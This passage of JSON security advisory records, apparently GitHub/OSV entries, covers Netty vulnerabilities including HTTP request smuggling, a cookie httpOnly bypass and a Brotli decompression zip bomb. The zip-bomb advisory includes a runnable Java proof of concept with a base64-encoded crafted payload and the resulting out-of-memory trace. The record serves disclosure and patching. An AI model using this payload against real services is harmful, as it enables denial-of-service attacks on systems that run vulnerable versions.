"https://lists.apache.org/thread.html/r5fc5786cdd640b1b0a3c643237ce0011f0a08a296b11c0e2c669022c@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e66e286afb5506cdfe9bbf68a323e8d09614f6d1ddc806ed0224700@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5baac01f9e06c40ff7aab209d5751b3b58802c63734e33324b70a06a@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r59bac5c09f7a4179b9e2460e8f41c278aaf3b9a21cc23678eb893e41@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r584cf871f188c406d8bd447ff4e2fd9817fca862436c064d0951a071@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r57245853c7245baab09eae08728c52b58fd77666538092389cc3e882@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5470456cf1409a99893ae9dd57439799f6dc1a60fda90e11570f66fe@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5232e33a1f3b310a3e083423f736f3925ebdb150844d60ac582809f8@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4ea2f1a9d79d4fc1896e085f31fb60a21b1770d0a26a5250f849372d@%3Cissues.kudu.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r490ca5611c150d193b320a2608209180713b7c68e501b67b0cffb925@%3Ccommits.servicecomb.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2021-03-09T18:47:09Z", "nvd_published_at": "2021-03-09T19:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wx5j-54mm-rqqq", "published": "2021-12-09T19:09:17Z", "modified": "2024-02-22T05:37:31.471154Z", "aliases": [ 
"CVE-2021-43797" ], "related": [ "CGA-2vx5-qv6g-67jq", "CGA-qxv3-xxff-qffv", "CVE-2021-43797" ], "summary": "HTTP request smuggling in netty", "details": "### Impact\n\nNetty currently just skips control chars when these are present at the beginning / end of the header name. We should better fail fast as these are not allowed by the spec and could lead to HTTP request smuggling.\n\nFailing to do the validation might cause netty to \"sanitize\" header names before it forward these to another remote system when used as proxy. This remote system can't see the invalid usage anymore and so not do the validation itself.\n\n", "affected": [ { "package": { "name": "io.netty:netty-codec-http", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.71.Final" } ] } ], "versions": [ "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", 
"4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.61.Final", "4.1.62.Final", "4.1.63.Final", "4.1.64.Final", "4.1.65.Final", "4.1.66.Final", "4.1.67.Final", "4.1.68.Final", "4.1.69.Final", "4.1.7.Final", "4.1.70.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-wx5j-54mm-rqqq/GHSA-wx5j-54mm-rqqq.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", 
"3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-wx5j-54mm-rqqq/GHSA-wx5j-54mm-rqqq.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-wx5j-54mm-rqqq/GHSA-wx5j-54mm-rqqq.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-wx5j-54mm-rqqq" }, { "type": "ADVISORY", "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2021-43797" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/11891" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/07aa6b5938a8b6ed7a6586e066400e2643897323" }, { "type": "WEB", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220107-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5316" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2021-12-09T18:17:28Z", "nvd_published_at": "2021-12-09T19:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xfv3-rrfm-f2rv", "published": "2020-06-30T21:01:21Z", "modified": "2024-02-16T08:04:08.954640Z", "aliases": [ "CVE-2015-2156" ], "summary": "Information Exposure in Netty", "details": "Netty before 3.9.8.Final, 3.10.x before 3.10.3.Final, 4.0.x before 4.0.28.Final, and 4.1.x before 4.1.0.Beta5 and Play Framework 2.x before 2.3.9 might allow remote attackers to bypass the httpOnly flag on cookies and obtain sensitive information by leveraging improper validation of cookie name and value characters.", "affected": [ { "package": { "name": "io.netty:netty-parent", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-parent" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.0.28.Final" } ] } ], "versions": [ "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", 
"4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.3.Final", "4.0.4.Final", "4.0.5.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.9.8.Final" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.10.0" }, { "fixed": "3.10.3.Final" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.10.0" }, { "fixed": 
"3.10.3.Final" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.9.8.Final" } ] } ], "versions": [ "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-2156" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/3748/commits/4ac519f534493bb0ca7a77e1c779138a54faa7b9" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/3754" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/2caa38a2795fe1f1ae6ceda4d69e826ed7c55e55" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/31815598a2af37f0b71ea94eada70d6659c23752" }, { "type": "WEB", 
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1222923" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a19bb1003b0d6cd22475ba83c019b4fc7facfef2a9e13f71132529d3@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dc1275aef115bda172851a231c76c0932d973f9ffd8bc375c4aba769@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-IONETTY-73571" }, { "type": "WEB", "url": "https://www.playframework.com/security/vulnerability/CVE-2015-2156-HttpOnlyBypass" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159379.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-May/159166.html" }, { "type": "WEB", "url": "http://netty.io/news/2015/05/08/3-9-8-Final-and-3.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2015/05/17/1" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/74704" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2020-06-30T20:59:55Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3p8m-j85q-pgmj", "published": "2025-09-03T18:00:55Z", "modified": "2025-09-04T14:30:07.795314Z", "aliases": [ "CVE-2025-58057" ], "related": [ "CGA-2q6x-j784-7h79", "CGA-2v4w-pr95-p9mq", "CGA-2xm9-r734-f5jh", "CGA-37rw-3rg8-5p2r", "CGA-48jf-6j23-46j3", "CGA-4f95-7j4w-9wc7", "CGA-553w-99qm-q83c", 
"CGA-5hhq-wjmg-gcjp", "CGA-6hmq-qr85-3xh8", "CGA-7546-ph65-xxxw", "CGA-7j2f-rgqc-qr3w", "CGA-7v5c-p2r6-p462", "CGA-829h-3xf3-j2qf", "CGA-83vx-rwv3-3fvr", "CGA-85wm-6c4p-5865", "CGA-8635-mm2p-7mfj", "CGA-875r-5r79-249x", "CGA-8gfq-pqwq-pv7h", "CGA-8jcq-2484-6w9x", "CGA-8x49-65rf-mc5q", "CGA-929v-xcpg-57wc", "CGA-948x-68h4-f2cj", "CGA-94cj-4rxx-5cfm", "CGA-9jgq-4qx7-v856", "CGA-9vh6-4325-2mgm", "CGA-c3rv-cp45-mhjr", "CGA-c885-5849-wwc2", "CGA-cfw2-ff39-v6rm", "CGA-cgr7-w7ff-wqcq", "CGA-g8vf-gjcg-2fgc", "CGA-gmwh-588r-7f2g", "CGA-gxhv-xr39-w63r", "CGA-h5j9-46vj-f522", "CGA-j3fg-43p4-p7h8", "CGA-j9xh-qf5r-6hr3", "CGA-jm8f-rrgp-45fp", "CGA-jpqm-5jrf-pxjm", "CGA-mq82-fgj6-fhmc", "CGA-p9pq-pmp9-8835", "CGA-pg9f-mw8h-mhvp", "CGA-ppc8-78x8-3698", "CGA-pprc-vhvh-79j3", "CGA-qw7c-p95f-xfgp", "CGA-r324-x764-h722", "CGA-r6gh-cvx2-8mqg", "CGA-rq57-8qrx-9frv", "CGA-v923-59cp-2r6q", "CGA-w9vw-4jr4-m4qp", "CGA-wfq9-4352-93hp", "CGA-xghx-54mj-627g" ], "summary": "Netty's decoders vulnerable to DoS via zip bomb style attack", "details": "### Summary\n\nWith specially crafted input, `BrotliDecoder` and some other decompressing decoders will allocate a large number of reachable byte buffers, which can lead to denial of service.\n\n### Details\n\n`BrotliDecoder.decompress` has no limit in how often it calls `pull`, decompressing data 64K bytes at a time. The buffers are saved in the output list, and remain reachable until OOM is hit. 
This is basically a zip bomb.\n\nTested on 4.1.118, but there were no changes to the decoder since.\n\n### PoC\n\nRun this test case with `-Xmx1G`:\n\n```java\nimport io.netty.buffer.Unpooled;\nimport io.netty.channel.embedded.EmbeddedChannel;\n\nimport java.util.Base64;\n\npublic class T {\n public static void main(String[] args) {\n EmbeddedChannel channel = new EmbeddedChannel(new BrotliDecoder());\n channel.writeInbound(Unpooled.wrappedBuffer(Base64.getDecoder().decode(\"aPpxD1tETigSAGj6cQ8vRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIA
aPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROMBIAEgIaHwBETlQQVFcXlgA=\")));\n }\n}\n```\n\nError:\n\n```\nException in thread \"main\" java.lang.OutOfMemoryError: Cannot reserve 4194304 bytes of direct buffer memory (allocated: 1069580289, limit: 1073741824)\n\tat java.base/java.nio.Bits.reserveMemory(Bits.java:178)\n\tat java.base/java.nio.DirectByteBuffer.\u003cinit\u003e(DirectByteBuffer.java:121)\n\tat java.base/java.nio.ByteBuffer.allocateDirect(ByteBuffer.java:332)\n\tat io.netty.buffer.PoolArena$DirectArena.allocateDirect(PoolArena.java:718)\n\tat io.netty.buffer.PoolArena$DirectArena.newChunk(PoolArena.java:693)\n\tat io.netty.buffer.PoolArena.allocateNormal(PoolArena.java:213)\n\tat io.netty.buffer.PoolArena.tcacheAllocateNormal(PoolArena.java:195)\n\tat io.netty.buffer.PoolArena.allocate(PoolArena.java:137)\n\tat io.netty.buffer.PoolArena.allocate(PoolArena.java:127)\n\tat io.netty.buffer.PooledByteBufAllocator.newDirectBuffer(PooledByteBufAllocator.java:403)\n\tat io.netty.buffer.AbstractByteBufAllocator.directBuffer(AbstractByteBufAllocator.java:188)\n\tat io.netty.buffer.AbstractByteBufAllocator.directBuffer(AbstractByteBufAllocator.java:179)\n\tat io.netty.buffer.AbstractByteBufAllocator.buffer(AbstractByteBufAllocator.java:116)\n\tat io.netty.handler.codec.compression.BrotliDecoder.pull(BrotliDecoder.java:70)\n\tat io.netty.handler.codec.compression.BrotliDecoder.decompress(BrotliDecoder.java:101)\n\tat io.netty.handler.codec.compression.BrotliDecoder.decode(BrotliDecoder.java:137)\n\tat 
io.netty.handler.codec.ByteToMessageDecoder.decodeRemovalReentryProtection(ByteToMessageDecoder.java:530)\n\tat io.netty.handler.codec.ByteToMessageDecoder.callDecode(ByteToMessageDecoder.java:469)\n\tat io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:290)\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:444)\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)\n\tat io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1357)\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:440)\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:868)\n\tat io.netty.channel.embedded.EmbeddedChannel.writeInbound(EmbeddedChannel.java:348)\n\tat io.netty.handler.codec.compression.T.main(T.java:11)\n```\n\n### Impact\n\nDoS for anyone using `BrotliDecoder` on untrusted input.", "affected": [ { "package": { "name": "io.netty:netty-codec-compression", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec-compression" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.2.0.Alpha1" }, { "fixed": "4.2.5.Final" } ] } ], "versions": [ "4.2.0.Alpha3", "4.2.0.Alpha4", "4.2.0.Alpha5", "4.2.0.Beta1", "4.2.0.Final", "4.2.0.RC1", "4.2.0.RC2", "4.2.0.RC3", "4.2.0.RC4", "4.2.1.Final", "4.2.2.Final", "4.2.3.Final", "4.2.4.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-3p8m-j85q-pgmj/GHSA-3p8m-j85q-pgmj.json" } }, { "package": { "name": "io.netty:netty-codec", "ecosystem": "Maven", "purl": 
"pkg:maven/io.netty/netty-codec" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1.125.Final" } ] } ], "versions": [ "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8", "4.0.0.Beta1", "4.0.0.Beta2", "4.0.0.Beta3", "4.0.0.CR1", "4.0.0.CR2", "4.0.0.CR3", "4.0.0.CR4", "4.0.0.CR5", "4.0.0.CR6", "4.0.0.CR7", "4.0.0.CR8", "4.0.0.CR9", "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", 